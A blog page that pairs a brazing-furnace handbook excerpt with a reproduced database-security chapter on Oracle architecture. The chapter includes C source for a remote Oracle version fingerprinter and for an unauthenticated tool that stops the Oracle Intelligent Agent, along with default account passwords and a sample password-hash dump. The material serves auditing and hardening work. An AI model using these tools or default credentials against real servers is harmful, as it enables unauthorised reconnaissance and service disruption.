4Handbook: design

Showing posts with label design. Show all posts

Wednesday, January 11, 2012

Brazing Handbook - Brazing operation

Brazing operation

Because the amount of flux in the CuproBraze process should be zero or absolutely minimal, and the parts should be oxide free after brazing, an inert atmosphere is needed to prevent oxidation of the parent and filler materials. As the brazing temperature is much lower than the melting points for the copper and brasses, the temperature differences in the parts during the brazing process are not critical. As the CuproBraze process covers parts from around 100g up to more than 100kg it is not possible to advise exact settings of the furnaces.

Atmosphere

The primary function of the brazing atmosphere is to prevent oxidation. Furnaces for the CuproBraze process use high-purity nitrogen to displace oxygen from inside the furnace. The atmosphere of the furnace must have an oxygen content of less than 20ppm. The brazing powder is very sensitive when the binder starts to evaporate, If moisture and oxygen levels ar e higher than these levels, the powder and the base material have a risk of oxidation at temperatures exceeding about 200ºC the and the result is very poor joints. Thus the starting point of the brazing cycle is as sensitive for oxygen-content as the rest of the brazing cycle.

Mixing the brazing atmosphere with small amount of hydrogen (H ₂) is not generally recommended. Hydrogen can sometimes react with the organic binder forming products which can have an influence on the brazing result. Before using hydrogen or hydrogen mixed atmosphere, the paste manufacturer should be consulted.

Important : The oxygen content should be controlled from the time when the heating starts and no heat should be applied if the atmospheric conditions are not met.

Temperature and time

The difference in the melting points for the filler metal and the copper and brass materials is more than 300ºC, which means that there is no risk to destroy the parts by melting. The temperature above the melting point for the filler metal (600ºC) should be as short as possible but still gain a satisfactory brazing result. It means that the furnace must be able to heat up the load in the brazing zone with a steep ramp. A common value is more than 30ºC per minute. The furnace must be able to operate up to 700ºC. Figure 27 shows a principle temperature-time curve for the CuproBraze process.

Figure 27. Pr inciple temperature-ti me curve for the CuproBraze
process.

In the part A, the sample is slowly heated up and the binder evaporates and/or is decomposed. When the binder disappears, it leaves the particles in the brazing paste without any protection from oxidation if the oxygen content is too high. The oxygen content should therefore be controlled from the time when the heating starts and no heat should be applied if the atmospheric conditions are not me t. The brazing result will be poor if the brazing powder is oxidized before it starts to melt. Note that some big heat exchangers as well as “one shot” parts can include a lot of s mall half closed volumes, which could influence necessary time to reach satisfactory oxygen content. Good convection in the furnace is therefore recommended.
By the rather slow heating rate in this zone, the temperature differences in the samples are minimized, and the distortion of the sample due to heat expansion can also be minimized.

In part B th e whole co re will be p reheated to just under the melting point of the brazing metal. To minimize the temperature-difference in the core at brazing, the part B should be designed so the temperature in the whole sample is as equal as possible when the brazing part is entered. In some batch furnaces, there is no pre-heating and in that case furnace settings that minimize the temperature differences in the sample have to be used.

Part C is the brazing period. When the temperature exceeds 600ºC, the brazing filler metal (powder or foil) starts to melt. When it melts, metallurgical reactions (diffusion) starts and the extent of the filler-substrate interaction is the most important. The filler interaction on the fin material is when it starts to be alloyed with tin, forming a copper-tin alloy close to the joint. It does not influence the performance except for exceptional long brazing times, where some loss of thermal performance (up to 10 %) of the heat exchanger can occur. The governing factor for the brazing cycle in most cases is the brazing of the tube-header joints. In chapter 5 figure 11 it is shown that the brazing temperature has a big impact on the possibility to satisfactory fill gaps. In practice it has been found that to satisfactorily wet the surfaces and fill the joints, you should ensure that the temperature in the joints reaches 650ºC or for some cases even 670ºC.

As the alloying reaction starts when the molten filler metal wets the surfaces, the time above 600ºC should be as short as possible but long enough to reach complete brazing in tube-header joints., For small radiators, 3 to 4 minutes is typical. For bigger parts the time is guided by the tube-header brazing.

To reach short brazing times, usually the setting of the brazing part (A) of the furnaces is higher than 650ºC.
The effect of the brazing cycle on the tube-to-fin joints cannot be seen by the naked eye. During optimization of the brazing cycle, overshooting of the brazing temperature can sometimes happen, but it will not lead to any noticeable visual effect on the brazed heat exchanger as the melting point for copper and brass is far higher than the brazing temperature.

To minimize the risk for distortion of the joints during cooling (part D), it is recommended to have a low cooling rate down to around 550ºC, typical value 1ºC/s.

To prevent discoloration of the brazed parts, they should not leave the inert atmosphere until the part temperature is below 150ºC. In places where the ambient humidity is high the exit temperature should be even lower to prevent discoloration. Note: This discoloration is only a cosmetic effect and it will not deteriorate the brazed joint.

At least during optimization of the brazing cycle, it is highly recommended that some kind of measurement of the temperature with thermocouples mounted in the core should be used. To have full control on the brazing process, it is recommended to also have this equipment available to check the process every now and then during normal production. If it is not possible to use the thermocouples together with equipments outside the furnace, it is recommended to use them with a tracker following the sample through the furnace.

The brazed part should be cooled down as uniformly as possible at least in the first phase to prevent deformation. The temperature drop should be equal in the whole core. One way to achieve this is to slow down the cooling to around 550ºC. At that temperature, the filler metal in the joints is no longer molten.
To satisfactorily wet the surfaces and fill the joints, ensure that the temperature in them reaches 650ºC or for some new types of header pastes even 660ºC.

Sunday, December 18, 2011

The Oracle Architecture

Overview

Oracle is probably the most popular database server out there, with the largest share of the market. It's used in most vertical market areas for a range of storage needs such as financial records, human resources, billing, and so on. One of the reasons for this is that Oracle was an earlier player in the RDBMS area and it provided versions of its database that ran on most operating systems; and it still does, although it seems its preferred OS of choice is moving away from Solaris toward Linux. In the wild you more often come across Oracle running on these platforms but there's also a good deal of Oracle running on HP-UX and AIX. It also seems with the explosion of e-Commerce a few years back that Oracle gained a lot of traction as the database of choice for web applications. This took the database one step closer to the hands of attackers and indeed, once Oracle came into the light from out of the backend of the backend, it gained more attention from the security side of things.

Oracle produces, in my opinion and as far as storing and querying data is concerned, one of the best database servers available. It's incredibly configurable and highly functional. There's an interface into the RDBMS to suit almost any developer taste and for every business use that can be dreamed of, it seems that Oracle has already provided the solution. All of this comes at a cost, though. Each sliver of functionality provides a breadth of attack surface; each solution a potential attack vector. The problem isn't just getting to grips with the abundance of functionality to configure, however. The code behind the RDBMS has historically been subject to a number of buffer overflows, and other security problems such as PL/SQL Injection in default packages and procedures have required patches in the past. All this said, as long as your database server doesn't ever get attacked, and of course assuming you're running Oracle, then you can long enjoy the great benefits this powerful RDBMS provides. But let's face it: in today's world it's not a case of, "Will I be attacked?" It's a case of "When will I be attacked?" So, if you are actually concerned about your Oracle security or lack thereof, read on.

Examining the Oracle Architecture

We begin this chapter by examining the physical layout of the database, such as the Oracle processes and how they interact with the network. We move on to examining authentication and authorization and then move to the logical layout of the database.

Oracle Processes and Oracle on the Network

This section describes the major components of Oracle and their interaction with the network. We begin with perhaps the most crucial network-facing component, the TNS Listener.

The Oracle TNS Listener

The TNS Listener is the hub of all communications in Oracle. "TNS" stands for Transparent Network Substrate and this is the protocol that Oracle uses to communicate between client and server. The TNS protocol is described on the Ethereal web site at http://www.ethereal.com/docs/dfref/t/tns.html.

The TNS Listener responds to a number of commands such as "version," "status," and "services," and when a database server is first started, it registers with the TNS Listener using the service_register_NSGR command. This lets the TNS Listener know that the database server is ready to accept connections. Incidentally, although the service_register_NSGR command is intended to be used locally the command can be sent over the network. In the past there have been denial of service issues with this command that can kill the TNS Listener.

When a client wishes to access the database server, the client connects first to the Listener. The Listener replies back with a TCP port that the client should connect to. The client connects to this port and then authenticates to the database server. If, however, the database has been configured in MTS, or Multi Threaded Server, mode then no port is assigned as such and communication with the database server takes place over the same TCP port that the Listener is listening on. The TNS Listener usually listens on TCP port 1521 but, depending upon the version of Oracle and what applications have been installed this port may be different, for example 1526. Regardless, the TNS Listener can be configured to listen on any TCP port.

The TNS Listener is also integral to PL/SQL and external procedures that we'll talk about later. Essentially when a PL/SQL procedure calls an external procedure, the RDBMS connects to the Listener, and the Listener launches a program called extproc to which the RDBMS connects. Extproc loads the library and executes the required function. As you'll see later this can be abused by attackers to run commands without a user ID or password.

If the XML Database is enabled—and it is by default in Oracle 9 and later—the TNS Listener holds open TCP port 2100 and 8080. The former allows querying of XML data over the FTP protocol and the latter over HTTP. The Listener proxies traffic on these ports to the RDBMS.

In versions of Oracle prior to 10g, the TNS Listener could be administered remotely. What makes this particularly dangerous is the fact that by default the Listener is installed without a password so it is possible for anyone to administer the Listener. A password should be set to help secure the system. The Listener Control Utility, lsnrctl, is the tool used to manage the Listener. Using this tool it's possible, among other things, to query the Listener for registered database services and retrieve status information:

C:\oracle\ora92\bin>lsnrctl
LSNRCTL for 32-bit Windows: Version 9.2.0.1.0 - Production on 10-OCT-2004 17:31:49
Copyright (c) 1991, 2002, Oracle Corporation.  All rights reserved.
Welcome to LSNRCTL, type "help" for information.
LSNRCTL> set current_listener 10.1.1.1
Current Listener is 192.168.0.34
LSNRCTL> status
Connecting to (DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=10.1.1.1))
(ADDRESS=(PROTOCOL=TCP)(HOST=10.1.1.1)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production
Start Date                10-OCT-2004 16:12:50
Uptime                    0 days 1 hr. 19 min. 23 sec
Trace Level               off
Security                  ON
SNMP                      OFF
Listener Parameter File   C:\oracle\ora92\network\admin\listener.ora
Listener Log File         C:\oracle\ora92\network\log\listener.log
Listening Endpoints Summary...
  (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(PIPENAME=\\.\pipe\EXTPROC0ipc)))
  (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=GLADIUS)(PORT=1521)))
  (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=GLADIUS)(PORT=8080))
(Presentation=HTTP)(Session=RAW))
  (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=GLADIUS)(PORT=2100))
(Presentation=FTP)(Session=RAW))
Services Summary...
Service "ORAXP" has 1 instance(s).
  Instance "ORAXP", status UNKNOWN, has 1 handler(s) for this service...
Service "PLSExtProc" has 1 instance(s).
  Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Service "oraxp.ngssoftware.com" has 1 instance(s).
  Instance "oraxp", status READY, has 1 handler(s) for this service...
Service "oraxpXDB.ngssoftware.com" has 1 instance(s).
  Instance "oraxp", status READY, has 1 handler(s) for this service...
The command completed successfully
LSNRCTL>

As you can see this leaks all kinds of useful information. As an interesting aside, if the Listener receives an invalid TNS packet, it will reply with a packet similar to

IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 94
      Identifier: 61557
      Flags: 0x4000
      TTL: 128
      Protocol: 6 (TCP)
      Checksum: 0x884c
      Source IP: 10.1.1.1
      Dest IP: 10.1.1.2
TCP Header
      Source port: 1521
      Dest port: 3100
      Sequence: 2627528132
      ack: 759427443
      Header length: 0x50
      Flags: 0x18 (ACK PSH )
      Window Size: 17450
      Checksum: 0xe1e8
      Urgent Pointer: 0
Raw Data
      00 36 00 00 04 00 00 00 22 00 00 2a 28 44 45 53  ( 6      "  *(DES)
      43 52 49 50 54 49 4f 4e 3d 28 45 52 52 3d 31 31  (CRIPTION=(ERR=11)
      35 33 29 28 56 53 4e 4e 55 4d 3d 31 35 31 30 30  (53)(VSNNUM=15100)
      30 30 36 35 29 29                                (0065)))

Looking at the value of VSNNUM, 151000065 in this case, we can derive the version of the server. When 151000065 is converted into hex we begin to see it better: 9001401. This equates to Oracle version 9.0.1.4.1. The following code can be used to query this information:

/************************************
/ Compile from a command line
/
/ C:\>cl /TC oraver.c /link wsock32.lib
/
*/
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
   
int GetOracleVersion(void);
int StartWinsock(void);
struct hostent *he;
struct sockaddr_in s_sa;
int ListenerPort=1521;
char host[260]="";
unsigned char TNSPacket[200]=
"\x00\x46\x00\x00\x01\x00\x00\x00\x01\x37\x01\x2C\x00\x00\x08\x00"
"\x7F\xFF\x86\x0E\x00\x00\x01\x00\x00\x0C\x00\x3A\x00\x00\x07\xF8"
"\x0C\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x4C\x00\x00"
"\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00";
   
int main(int argc, char *argv[])
{
      unsigned int err=0;
      if(argc == 1)
      {
            printf("\n\t*** OraVer ***");
            printf("\n\n\tGets the Oracle version number.");
            printf("\n\n\tC:\\>%s host [port]",argv[0]);
            printf("\n\n\tDavid Litchfield\n\tdavidl@ngssoftware.com\n\t22th April 2003\n");
            return 0;
      }
      strncpy(host,argv[1],256);
      if(argc == 3)
            ListenerPort = atoi(argv[2]);
      err = StartWinsock();
      if(err==0)
            printf("Error starting Winsock.\n");
      else
            GetOracleVersion();
      WSACleanup();
      return 0;
}            
   
int StartWinsock()
{
      int err=0;
      unsigned int addr;
      WORD wVersionRequested;
      WSADATA wsaData;
      wVersionRequested = MAKEWORD( 2, 0 );
      err = WSAStartup( wVersionRequested, &wsaData );
      if ( err != 0 )
            return 0;
      
      if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
            return 0;
      
      s_sa.sin_addr.s_addr=INADDR_ANY;
      s_sa.sin_family=AF_INET;
      if (isalpha(host[0]))
      {
              he = gethostbyname(host);
            if(he == NULL)
            {
                  printf("Failed to look up %s\n",host);
                  return 0;
            }
            memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
      }
      else
      {
            addr = inet_addr(host);
            memcpy(&s_sa.sin_addr,&addr,4);
      }
      return 1;
}
   
int GetOracleVersion(void)
{
      
      unsigned char resp[200]="";
      unsigned char ver[8]="";
      unsigned char h=0,l=0,p=0,q=0;
      int snd=0,rcv=0,count=0;
      SOCKET cli_sock;
      char *ptr = NULL;
   
      cli_sock=socket(AF_INET,SOCK_STREAM,0);
      if (cli_sock==INVALID_SOCKET)
                return printf("\nFailed to create the socket.\n");
      
      s_sa.sin_port=htons((unsigned short)ListenerPort);
      if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
      {
            printf("\nFailed to connect to the Listener.\n");
            goto The_End;
      }
      snd=send(cli_sock, TNSPacket , 0x3A , 0);
      snd=send(cli_sock, "NGSSoftware\x00" , 12 , 0);
      rcv = recv(cli_sock,resp,196,0);
      if(rcv == SOCKET_ERROR)
      {
            printf("\nThere was a receive error.\n");
            goto The_End;
      }
      while(count < rcv)
      {
            if(resp[count]==0x00)
                  resp[count]=0x20;
            count++;
      }
      
      ptr = strstr(resp,"(VSNNUM=");
      if(!ptr)
      {
            printf("\nFailed to get the version.\n");
            goto The_End;
      }
      ptr = ptr + 8;
      count = atoi(ptr);
      count = count << 4;
      memmove(ver,&count,4);
      h = ver[3] >> 4;
      l = ver[3] << 4;
      l = l >> 4;
      p = ver[1] >> 4;
      q = ver[0] >> 4;
      printf("\nVersion of Oracle is %d.%d.%d.%d.%d\n",h,l,ver[2],p,q);
The_End:
      closesocket(cli_sock);
      return 0;
}

The Oracle RDBMS

Because we'll be talking about the Oracle RDBMS in depth in later sections, we'll simply cover a few of the more important details here. One of the major differences between Oracle running on Windows and Oracle running on UNIX-based platforms is the number of processes that combine to create the actual RDBMS. On Windows there is simply the oracle.exe process, but on UNIX platforms there are multiple processes each responsible for some part of functionality. Using ps we can list these processes:

$ ps -ef | grep oracle
  oracle  17749     1  0 11:26:13 ?        0:00 ora_pmon_orasidsol
  oracle  10109     1  0   Sep 18 ?        0:01 /u01/oracle/product/9.2.0/bin/tnslsnr listener920 -inherit
  oracle  17757     1  0 11:26:16 ?        0:01 ora_smon_orasidsol
  oracle  17759     1  0 11:26:17 ?        0:00 ora_reco_orasidsol
  oracle  17751     1  0 11:26:15 ?        0:01 ora_dbw0_orasidsol
  oracle  17753     1  0 11:26:16 ?        0:01 ora_lgwr_orasidsol  
  oracle  17755     1  0 11:26:16 ?        0:05 ora_ckpt_orasidsol
  oracle  17762     1  0 11:30:59 ?        1:34 oracleorasidsol (LOCAL=NO)

Each RDBMS process has the name of the database SID appended to it—in this case orasidsol. The following list looks at each process and discusses what each does.

The PMON process. This is the Process Monitor process and its job is to check if any of the other processes fail, and perform housekeeping tasks if one does such as free handles and so on.
The SMON process. This is the System Monitor process and it is responsible for crash recovery if a database instance crashes.
The RECO process. This is the Distributed Transaction Recovery process and handles any unresolved transactions.
The DBWR process. This is the Database Writer process. There may be many such processes running. From the preceding ps listing we can see only one—numbered 0.
The LGWR process. This is the Log Writer process and is responsible for handling redo logs.
The CKPT process. This is the Checkpoint process and every so often it nudges the Database Writer process to flush its buffers.

All of these background processes are present on Windows, too; they're just all rolled up into the main oracle.exe process.

The oracleorasidsol process is what is termed the shadow or server process. It is actually this process that the client interacts with. Information about processes and sessions is stored in the V$PROCESS and V$SESSION tables in SYS schema.

The Oracle Intelligent Agent

This component is peripheral to the actual RDBMS but is integral to its management. The Intelligent Agent performs a number of roles, but probably its most significant function is to gather management and performance data, which can be queried through SNMP or Oracle's own proprietary protocols. The Agent listens on TCP port 1748, 1808, and 1809. As far as SNMP is concerned the port is configurable and may be the default of UDP 161 or often dbsnmp can be found listening for SNMP requests on 1161. In Oracle 10g dbsnmp has gone and in its place is the emagent.

Performance data can be queried remotely without having to present a username or password using the Oracle Enterprise Manager tool—specifically using the "Performance Manager" of the "Diagnostic Pack." This, needless to say, can provide attackers with a wealth of information about the remote system. For example, they could list all running processes, get memory usage, and so on.

Another of the tools provided by Oracle to manage the Intelligent Agent is the agentctl utility. Using this tool the Agent can be stopped, started, queried for its status, and blackouts started and stopped. A blackout essentially tells the Agent to stop gathering data or stop executing jobs. The agentctl utility is somewhat limited though; it can't really be used to query remote systems. However, it does use sockets on the local system to communicate with the Agent so a couple of strategic break points in a debugging session will reveal what traffic is actually being passed backward and forward. If you prefer to use port redirection tools for this kind of work this will do admirably, also. Whichever way you dump the packets you'll quickly notice that none of the communications are authenticated. This means, for example, an attacker could define blackouts or stop the Agent without having to present any username or password. The following code can be used to dump information from the Intelligent Agent:

#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#define DBSNMPPORT 1748
int QueryDBSNMP(int in);
int StartWinsock(void);
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";
   
unsigned char Packet_1[]=
"\x00\x6A\x00\x00\x01\x00\x00\x00\x01\x38\x01\x2C\x00\x00\x08\x00"
"\x7F\xFF\x86\x0E\x00\x00\x01\x00\x00\x30\x00\x3A\x00\x00\x00\x64"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB4\x00\x00"
"\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x28\x4F\x45\x4D\x5F\x4F"
"\x4D\x53\x3D\x28\x56\x45\x52\x53\x49\x4F\x4E\x3D\x28\x52\x45\x4C"
"\x45\x41\x53\x45\x3D\x39\x2E\x32\x2E\x30\x2E\x31\x2E\x30\x29\x28"
"\x52\x50\x43\x3D\x32\x2E\x30\x29\x29\x29\x54\x76\x10";
unsigned char Packet_2[]=
"\x00\x42\x00\x00\x06\x00\x00\x00\x00\x00\x28\x41\x44\x44\x52\x45"
"\x53\x53\x3D\x28\x50\x52\x4F\x54\x4F\x43\x4F\x4C\x3D\x74\x63\x70"
"\x29\x28\x48\x4F\x53\x54\x3D\x31\x36\x39\x2E\x32\x35\x34\x2E\x33"
"\x32\x2E\x31\x33\x33\x29\x28\x50\x4F\x52\x54\x3D\x31\x37\x34\x38"
"\x29\x29\x00\x3E\x00\x00\x06\x00\x00\x00\x00\x00\x20\x08\xFF\x03"
"\x01\x00\x12\x34\x34\x34\x34\x34\x78\x10\x10\x32\x10\x32\x10\x32"
"\x10\x32\x10\x32\x54\x76\x00\x78\x10\x32\x54\x76\x10\x00\x00\x80"
"\x01\x00\x00\x00\x00\x00\x84\x03\xBC\x02\x80\x02\x80\x02\x00\x00";
unsigned char Packet_3[]=
"\x00\x52\x00\x00\x06\x00\x00\x00\x00\x00\x44\x00\x00\x80\x02\x00"
"\x00\x00\x00\x04\x00\x00\xB0\x39\xD3\x00\x90\x00\x23\x00\x00\x00"
"\x44\x32\x44\x39\x46\x39\x35\x43\x38\x32\x42\x46\x2D\x30\x35\x45"
"\x44\x2D\x45\x30\x30\x30\x2D\x37\x32\x33\x30\x30\x38\x33\x31\x35"
"\x39\x42\x30\x02\x00\x30\x01\x01\x00\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x1E\x00\x00\x06\x00\x00\x00\x00\x00\x10\x00\x00\x80"
"\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
unsigned char Packet_4[]=
"\x00\x0A\x00\x00\x06\x00\x00\x00\x00\x40";
int main(int argc, char *argv[])
{
      int count = 56;
      if(argc != 3)
      {
            printf("\n\n\n\tOracle DBSNMP Tool\n\n\t");
            printf("C:\\>%s host status|stop",argv[0]);
            printf("\n\n\tDavid Litchfield\n\t");
            printf("davidl@ngssoftware.com");
            printf("\n\t4th June 2004\n\n\n\n");
            return 0;
      }
      strncpy(host,argv[1],250);
      if(!StartWinsock())
            return printf("Error starting Winsock.\n");
      if(stricmp(argv[2],"status")==0)
      {
            printf("\n\nStatus...\n\n");
            Packet_3[69] = 0x38;
      }
      if(stricmp(argv[2],"stop")==0)
      {
            printf("\n\nStopping...\n\n");
            Packet_3[69] = 0x37;
      }
      QueryDBSNMP(Packet_3[69]);
      WSACleanup();      
      return 0;
}            
   
int StartWinsock()
{
      int err=0;
      WORD wVersionRequested;
      WSADATA wsaData;
      wVersionRequested = MAKEWORD( 2, 0 );
      err = WSAStartup( wVersionRequested, &wsaData );
      if (err != 0)
            return 0;
      if (LOBYTE(wsaData.wVersion) !=2 || HIBYTE(wsaData.wVersion) !=0)
        {
            WSACleanup();
            return 0;
      }
      if (isalpha(host[0]))
      {
            he = gethostbyname(host);
            s_sa.sin_addr.s_addr=INADDR_ANY;
            s_sa.sin_family=AF_INET;
            memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
        }
      else
      {
            addr = inet_addr(host);
            s_sa.sin_addr.s_addr=INADDR_ANY;
            s_sa.sin_family=AF_INET;
            memcpy(&s_sa.sin_addr,&addr,4);
            he = (struct hostent *)1;
      }
      if (he == NULL)
            return 0;
      return 1;
}
   
int QueryDBSNMP(int in)
{
      unsigned char resp[1600]="";
      int snd=0,rcv=0,count=0;
      unsigned int ttlbytes=0;
      unsigned int to=2000;
      struct sockaddr_in cli_addr;
      SOCKET cli_sock;
      cli_sock=socket(AF_INET,SOCK_STREAM,0);
      if (cli_sock==INVALID_SOCKET)
      {
            printf("socket error.\n");
            return 0;
          }
      cli_addr.sin_family=AF_INET;
      cli_addr.sin_addr.s_addr=INADDR_ANY;        
      cli_addr.sin_port=htons((unsigned short)0);
//setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
      if (bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR)
      {
            closesocket(cli_sock);
            printf("bind error");
            return 0;
          }
      s_sa.sin_port=htons((unsigned short)DBSNMPPORT);
      if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
      {
            closesocket(cli_sock);
            printf("Connect error");
            return 0;
      }
      snd=send(cli_sock, Packet_1 , 0x6A , 0);
      rcv = recv(cli_sock,resp,1500,0);
      if(rcv == SOCKET_ERROR)
      {
            closesocket(cli_sock);
            printf("recv error.\n");
            return 0;
      }
      PrintResponse(rcv,resp);
      snd=send(cli_sock, Packet_2 , 0x80 , 0);
      rcv = recv(cli_sock,resp,1500,0);
      if(rcv == SOCKET_ERROR)
      {
            closesocket(cli_sock);
            printf("recv error.\n");
            return 0;
      }
      PrintResponse(rcv,resp);
      snd=send(cli_sock, Packet_3 , 0x70 , 0);
      rcv = recv(cli_sock,resp,1500,0);
      if(rcv == SOCKET_ERROR)
      {
            closesocket(cli_sock);
            printf("recv error.\n");
            return 0;
      }
      PrintResponse(rcv,resp);
      if(in == 0x37)
      {
            closesocket(cli_sock);
            return printf("Oracle Intelligent Agent has stopped");
      }
      snd=send(cli_sock, Packet_4 , 0x0A , 0);
      rcv = recv(cli_sock,resp,1500,0);
      if(rcv == SOCKET_ERROR)
      {
            closesocket(cli_sock);
            printf("recv error.\n");
            return 0;
      }
      closesocket(cli_sock);
      return 0;
}
int PrintResponse(int size, unsigned char *ptr)
{
      int count = 0;
      int chk = 0;
      int sp = 0;
      printf("%.4X   ",count);
      while(count < size)
      {
            if(count % 16 == 0 && count > 0)
            {
                  printf("   ");
                  chk = count;
                  count = count - 16;
                  while(count < chk)
                  {
                        if(ptr[count]<0x20)
                              printf(".");
                        else
                              printf("%c",ptr[count]);
                        count ++;
                  }
                  printf("\n%.4X   ",count);
            }
            printf("%.2X ",ptr[count]);
            count ++;
      }
      count = count - chk;
      count = 17 - count;
      while(sp < count)
      {
            printf("   ");
            sp++;
      }
      count = chk;
      while(count < size)
      {
            if(ptr[count]<0x20)
                  printf(".");
            else
                  printf("%c",ptr[count]);
            count ++;
      }
      printf("\n\n\n\n");
      return 0;
}

The Intelligent Agent often needs to communicate with the database server and requires a user account and password for the RDBMS. By default this is DBSNMP/DBSNMP—one of the better known default Oracle accounts. When performing a security audit of an Oracle database server, I often find that all the default passwords have been changed except this one. The reason is that if you change the password on the database server, snmp traps don't work; you need to inform the Intelligent Agent of the password change, too. It seems that this is often too much hassle and is left in its default state. To properly change the password for the dbsnmp account you'll need to edit the snmp_rw.ora file as well. You can find this file on the ORACLE_HOME/network/admin directory. Add the following:

SNMP.CONNECT.SID.NAME=dbsnmp
SNMP.CONNECT.SID.PASSWORD=password

"SID" is the SID of the database server. You can get this from the snmp_ro.ora file in the same directory. Once done, change the password for DBSNMP in Oracle.

Note—never change a password using the ALTER USER command. The reason you shouldn't do this is because the SQL is logged if tracing is on, meaning that the password is also logged in clear text. Use the password command in SQL*Plus instead. In this case an encrypted version of the password is logged making it more secure against prying eyes.

Oracle Authentication and Authorization

Oracle supports two kinds of accounts: database accounts and operating system accounts. Operating system accounts are authenticated externally by the operating system and are generally preceded with OP$, whereas database accounts are authenticated against the database server. A number of users are created by default when the database is installed; some of these are integral to the correct operation of the database whereas others are simply created because a package has been installed. The most important database login on an Oracle server is the SYS login. SYS is god as far as the database is concerned and can be likened to the root account on UNIX systems or Administrator on Windows. SYS is installed with a default password of CHANGE_ON_INSTALL, although, as of 10g, the user is prompted for a password to assign—which is good (various components that you install can define default usernames and passwords—Appendix C includes a list of more than 600 default account names and passwords). Another key account is SYSTEM. This is just as powerful as SYS and has a default password of MANAGER. Incidentally, passwords in Oracle are converted to uppercase making them easier to brute force if one can get a hold of the password hashes. Details such as usernames and passwords are stored in the SYS.USER$ table.

SQL> select name,password from sys.user$ where type#=1;
NAME                           PASSWORD
------------------------------ ------------------------------
SYS                            2696A092833AFD9F
SYSTEM                         ED58B07310B19002
OUTLN                          4A3BA55E08595C81
DIP                            CE4A36B8E06CA59C
DMSYS                          BFBA5A553FD9E28A
DBSNMP                         E066D214D5421CCC
WMSYS                          7C9BA362F8314299
EXFSYS                         66F4EF5650C20355
ORDSYS                         7EFA02EC7EA6B86F
ORDPLUGINS                     88A2B2C183431F00
SI_INFORMTN_SCHEMA             84B8CBCA4D477FA3
MDSYS                          72979A94BAD2AF80
CTXSYS                         71E687F036AD56E5
OLAPSYS                        3FB8EF9DB538647C
WK_TEST                        29802572EB547DBF
XDB                            88D8364765FCE6AF
ANONYMOUS                      anonymous
SYSMAN                         447B729161192C24
MDDATA                         DF02A496267DEE66
WKSYS                          69ED49EE1851900D
WKPROXY                        B97545C4DD2ABE54
MGMT_VIEW                      B7A76767C5DB2BFD
SCOTT                          F894844C34402B67
23 rows selected.

Both SYS and SYSTEM are DBA privileged accounts but on a typical system you'll also find at least a few more DBAs—namely MDSYS, CTXSYS, WKSYS, and SYSMAN. You can list all DBAs with the following query:

SQL> select distinct a.name from sys.user$ a, sys.sysauth$ b where a.user#=b.grantee# and b.privilege#=4;
NAME
-----------------------------
CTXSYS
SYS
SYSMAN
SYSTEM
WKSYS

(If you know a bit about Oracle and are wondering why I'm not using the DBA_USERS and DBA_ROLE_PRIVS views, see the last chapter in the Oracle section—you can't trust views.)

This is enough on users and roles at the moment. Let's look at how database users are authenticated.

Database Authentication

When a client authenticates to the server, rather than sending a password across the wire in clear text like most other RDBMSes Oracle chooses to encrypt it. Here's how the authentication process works. First, the client connects to the TNS Listener and requests access to the RDBMS, specifying its SID. Provided the SID is valid the Listener responds with a TCP port and redirects the client to this port. On connecting to this port, to an Oracle shadow process, the client presents their username:

CLIENT to SERVER
00 c4 00 00 06 00 00 00 00 00 03 76 02 e0 91 d3  (           v    )
00 06 00 00 00 01 00 00 00 cc a2 12 00 04 00 00  (                )
00 9c a0 12 00 8c a4 12 00 06 73 79 73 74 65 6d  (          system)
0d 00 00 00 0d 41 55 54 48 5f 54 45 52 4d 49 4e  (     AUTH_TERMIN)
41 4c 07 00 00 00 07 47 4c 41 44 49 55 53 00 00  (AL     GLADIUS  )
00 00 0f 00 00 00 0f 41 55 54 48 5f 50 52 4f 47  (       AUTH_PROG)
52 41 4d 5f 4e 4d 0b 00 00 00 0b 73 71 6c 70 6c  (RAM_NM     sqlpl)
75 73 2e 65 78 65 00 00 00 00 0c 00 00 00 0c 41  (us.exe         A)
55 54 48 5f 4d 41 43 48 49 4e 45 12 00 00 00 12  (UTH_MACHINE     )
57 4f 52 4b 47 52 4f 55 50 5c 47 4c 41 44 49 55  (WORKGROUP\GLADIU)
53 00 00 00 00 00 08 00 00 00 08 41 55 54 48 5f  (S          AUTH_)
50 49 44 08 00 00 00 08 38 37 32 3a 32 34 33 36  (PID     872:2436)
00 00 00 00                                      (    )

Here you can see the client is attempting to authenticate as the "SYSTEM" user. If the user exists on the remote system, the server responds with a ses-sion key:

SERVER TO CLIENT
00 87 00 00 06 00 00 00 00 00 08 01 00 0c 00 00  (                )
00 0c 41 55 54 48 5f 53 45 53 53 4b 45 59 20 00  (  AUTH_SESSKEY  )
00 00 20 39 31 33 42 36 46 38 36 37 37 30 39 44  (   913B6F867709D)
34 34 35 39 34 34 34 41 32 41 36 45 31 31 43 44  (4459444A2A6E11CD)
